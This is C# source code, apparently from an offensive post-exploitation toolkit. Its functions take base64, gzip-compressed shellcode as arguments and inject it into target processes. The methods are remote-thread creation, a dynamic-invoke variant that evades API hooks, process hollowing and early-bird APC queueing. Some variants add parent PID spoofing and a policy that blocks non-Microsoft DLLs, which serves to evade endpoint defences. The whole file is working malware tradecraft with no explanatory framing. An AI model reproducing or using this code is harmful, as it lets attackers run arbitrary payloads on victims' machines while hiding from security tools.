public static string InjectCreateRemThread(string[] arguments)
{
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
int targetId = Int32.Parse(arguments[2]);
uint oldProtect = 0;
GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
try
{
IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
IntPtr lpThreadId = IntPtr.Zero;
IntPtr procHandle = Interop.OpenProcess((uint)flags.ProcessAccessRights.All, false, (uint)targetId);
IntPtr remoteAddr = Interop.VirtualAllocEx(procHandle, IntPtr.Zero, buffer.Length, (uint)flags.MemAllocation.MEM_COMMIT, (uint)flags.MemProtect.PAGE_READWRITE);
if (Interop.WriteProcessMemory(procHandle, remoteAddr, pinnedBuffer, buffer.Length, out lpNumberOfBytesWritten))
{
Interop.VirtualProtectEx(procHandle, remoteAddr, buffer.Length, (uint)flags.MemProtect.PAGE_EXECUTE_READ, out oldProtect);
Interop.CreateRemoteThread(procHandle, IntPtr.Zero, 0, remoteAddr, IntPtr.Zero, 0, out lpThreadId);
handle.Free();
}
else
{
return("Failed to inject shellcode!");
}
}
catch (Exception ex)
{
return(ex.Message);
}
return(null);
}
public static string ProcHollowRun(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
ProcessHollowing prochollow = new ProcessHollowing();
prochollow.Hollow(targetProcess, buffer);
return(null);
}
public static string InjectAPC(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
IntPtr lpThreadId = IntPtr.Zero;
uint oldProtect = 0;
STARTUPINFOEX si = new STARTUPINFOEX();
flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();
var processSecurity = new flags.SECURITY_ATTRIBUTES();
var threadSecurity = new flags.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
try
{
bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);
IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);
IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
Interop.ResumeThread(ThreadHandle);
handle.Free();
}
catch (Exception ex)
{
handle.Free();
Console.WriteLine(ex.Message);
}
return(null);
}
public static string Dynamic_InjectCreateRemThread(string[] arguments)
{
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
int targetId = Int32.Parse(arguments[2]);
IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
IntPtr lpThreadId = IntPtr.Zero;
uint oldProtect = 0;
GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
try
{
var pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "OpenProcess");
var openProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.OpenProcess)) as DInterop.OpenProcess;
var hProcess = openProcess((uint)flags.ProcessAccessRights.All, false, (uint)targetId);
pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "VirtualAllocEx");
var virtualAllocEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.VirtualAllocEx)) as DInterop.VirtualAllocEx;
var alloc = virtualAllocEx(hProcess, IntPtr.Zero, buffer.Length, (uint)flags.MemAllocation.MEM_COMMIT, (uint)flags.MemProtect.PAGE_READWRITE);
pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "WriteProcessMemory");
var writeProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.WriteProcessMemory)) as DInterop.WriteProcessMemory;
writeProcessMemory(hProcess, alloc, pinnedBuffer, buffer.Length, out lpNumberOfBytesWritten);
pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "VirtualProtectEx");
var virtualProtectex = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.VirtualProtectEx)) as DInterop.VirtualProtectEx;
virtualProtectex(hProcess, alloc, buffer.Length, (uint)flags.MemProtect.PAGE_EXECUTE_READ, out oldProtect);
pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "CreateRemoteThread");
var createRemoteThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.CreateRemoteThread)) as DInterop.CreateRemoteThread;
createRemoteThread(hProcess, IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out lpThreadId);
handle.Free();
}
catch (Exception ex)
{
return(ex.Message);
}
return(null);
}
public static string PPidProcHollowRun(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
PPID.ParentPidSpoofing Parent = new PPID.ParentPidSpoofing();
PROCESS_INFORMATION pinf = Parent.ParentSpoofing(SearchPID.SearchForPPID(), targetProcess);
ProcessHollowing hollow = new ProcessHollowing();
hollow.CreateSection((uint)buffer.Length);
hollow.FindEntry(pinf.hProcess);
hollow.SetLocalSection((uint)buffer.Length);
hollow.CopyShellcode(buffer);
hollow.MapAndStart(pinf);
Interop.CloseHandle(pinf.hThread);
Interop.CloseHandle(pinf.hProcess);
return(null);
}
public static string InjectAPCPPID(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
var blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
int parentId = SearchPID.SearchForPPID();
IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
IntPtr lpThreadId = IntPtr.Zero;
uint oldProtect = 0;
var lpValueProc = IntPtr.Zero;
STARTUPINFOEX siEx = new STARTUPINFOEX();
flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();
var processSecurity = new flags.SECURITY_ATTRIBUTES();
var threadSecurity = new flags.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
try
{
var lpSize = IntPtr.Zero;
Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);
if (IntPtr.Size == 4)
{
Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero);
}
else
{
Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON));
}
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
var parentHandle = Interop.OpenProcess(flags.ProcessAccessRights.CreateProcess | flags.ProcessAccessRights.DuplicateHandle, false, parentId);
lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValueProc, parentHandle);
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref siEx, out pi);
IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);
IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);
IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
Interop.ResumeThread(ThreadHandle);
handle.Free();
}
catch (Exception ex)
{
handle.Free();
Console.WriteLine(ex.Message);
}
return(null);
}
